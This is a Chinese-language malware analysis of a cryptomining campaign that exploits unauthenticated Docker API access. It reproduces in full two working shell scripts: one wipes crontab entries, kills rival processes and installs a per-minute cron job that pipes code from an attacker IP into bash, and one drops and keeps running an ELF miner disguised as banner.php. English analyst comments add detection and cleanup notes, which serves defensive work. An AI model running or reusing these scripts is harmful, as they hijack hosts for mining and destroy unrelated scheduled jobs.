利用Docker API未授权访问执行漏洞传播挖矿木马,攻击目标端口号为49153
exp攻击成功后，首先下载并执行cron.sh。脚本cron.sh会检查并清理其他挖矿进程，然后下载并运行自身的挖矿程序。cron.sh地址及代码如下：
#!/bin/sh
# Analyst note: stage-1 script (cron.sh) delivered after the Docker API exploit.
# It (1) removes crontab entries belonging to competing miners, (2) kills
# competing processes, and (3) installs its own once-per-minute crontab entry.
# Indicators quoted below (IP, URL path) are taken verbatim from the sample.

# Downloader selection. The default is wget; the two tests below are independent
# rather than if/elif, so when both curl and wget exist the later wget branch
# wins. `-s` tests for a non-empty file at the fixed path, not for PATH lookup.
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
LDR="wget -q -O -"
fi
# Crontab cleanup: each line re-reads the whole crontab, drops every entry whose
# text contains the pattern, and writes it back. Several patterns are very broad
# ("logo", "jpg", "png", "tmp", "shuf", "ash"), so on an infected host legitimate
# cron jobs are likely to be destroyed too — restore them from backup, not from
# the live crontab. The remaining patterns are names/addresses of rival campaigns.
crontab -l | sed '/update.sh/d' | crontab -
crontab -l | sed '/logo4/d' | crontab -
crontab -l | sed '/logo9/d' | crontab -
crontab -l | sed '/logo0/d' | crontab -
crontab -l | sed '/logo/d' | crontab -
crontab -l | sed '/tor2web/d' | crontab -
crontab -l | sed '/jpg/d' | crontab -
crontab -l | sed '/png/d' | crontab -
crontab -l | sed '/tmp/d' | crontab -
crontab -l | sed '/zmreplchkr/d' | crontab -
crontab -l | sed '/aliyun.one/d' | crontab -
crontab -l | sed '/3.215.110.66.one/d' | crontab -
crontab -l | sed '/pastebin/d' | crontab -
crontab -l | sed '/onion/d' | crontab -
crontab -l | sed '/lsd.systemten.org/d' | crontab -
crontab -l | sed '/shuf/d' | crontab -
crontab -l | sed '/ash/d' | crontab -
crontab -l | sed '/mr.sh/d' | crontab -
crontab -l | sed '/185.181.10.234/d' | crontab -
crontab -l | sed '/localhost.xyz/d' | crontab -
crontab -l | sed '/45.137.151.106/d' | crontab -
crontab -l | sed '/111.90.159.106/d' | crontab -
# Process cleanup by command-line substring (pkill -f matches the full command
# line). The "sleep 60" pattern kills ANY process whose command line contains
# that string, so unrelated sleeping jobs die as well.
pkill -f sysupdate
pkill -f networkservice
pkill -f sysguard
ps aux| grep "sleep 60"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
ps aux| grep "./crun"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
pgrep -f ./watchbog | xargs -I % kill -9 %
# Kill whatever process holds an ESTABLISHED/SYN_SENT connection to a rival
# address: field 7 of `netstat -antp` is "PID/Program", the sed strips "/Program".
# Detection value: these three IPs are rival infrastructure, not this campaign's.
netstat -antp | grep '108.174.197.76' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '192.236.161.6' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '88.99.242.92' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
pkill -f pastebin
pkill -f 185.193.127.115
# Persistence check: does the current crontab already reference this campaign's
# host? `$?` on the next line is the status of the final `grep -v grep`, which
# here only filters crontab text (effectively a no-op unless an entry contains
# the word "grep"); it succeeds iff at least one matching entry passed through.
crontab -l | grep -e "85.214.149.236" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
echo "setup cron"
# Persistence install: append a job that runs every minute, fetches .../run with
# the chosen downloader and pipes it straight into bash. Host-based detection:
# a crontab line containing this IP/URL, and bash spawned from cron each minute
# with wget/curl as its stdin source.
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http://85.214.149.236:443/sugarcrm//.../run | bash > /dev/null 2>&1"
) | crontab -
fi
脚本run会下载伪装成banner.php的文件，该文件其实是名为docker-update的ELF文件。run.sh地址及代码如下：
#!/bin/sh
# Analyst note: stage-2 script ("run") fetched every minute by the cron entry
# installed by cron.sh. It drops the miner ELF and keeps it running.
# The `function` keyword is a bash/ash extension, not POSIX sh — this script
# presumably relies on the target's /bin/sh accepting it; confirm per target.

# Fetch the ELF served under the misleading name banner.php and install it as
# /usr/bin/docker-update (a name chosen to blend in with Docker tooling), then
# make it executable and immutable so ordinary rm/overwrite fails.
# `tntrecht` is not a standard utility — presumably a bundled chattr substitute
# for hosts where chattr is missing; verify against the sample. For response,
# expect to need `chattr -i` on this path before removal.
function downloadxmin(){
wget -q http://85.214.149.236:443/sugarcrm//banner.php -O /usr/bin/docker-update
chmod +x /usr/bin/docker-update 2>/dev/null 1>/dev/null
chattr +i /usr/bin/docker-update 2>/dev/null 1>/dev/null
tntrecht +i /usr/bin/docker-update 2>/dev/null 1>/dev/null
}
# Watchdog: start /usr/bin/docker-update if pidof reports no running instance.
# The redirections on the assignment line apply to the (empty) command, not to
# the backtick substitution, so pidof's own stderr is likely not silenced.
# Because cron re-runs this script every minute, killing the process alone is
# not remediation — the crontab entry and the immutable binary must go too.
function startxmin(){
xminpid=`pidof /usr/bin/docker-update` 2>/dev/null 1>/dev/null
if [ -z "${xminpid}" ]; then
#echo "xmin not running! starting now!"
/usr/bin/docker-update 2>/dev/null 1>/dev/null
else
#echo "xmin is running"
echo " "
fi
}
# Entry point: reuse the binary if it is already on disk, otherwise download it
# first. Either way the watchdog ends up (re)starting the miner, so the file's
# presence at /usr/bin/docker-update is a reliable on-disk indicator.
if [ -f /usr/bin/docker-update ] ; then
#echo 'xmin found'
startxmin
else
#echo 'xmin not found'
downloadxmin
startxmin
fi
该地址的其他样本如下: http://85.214.149.236:443/sugarcrm//.../ 截图如下: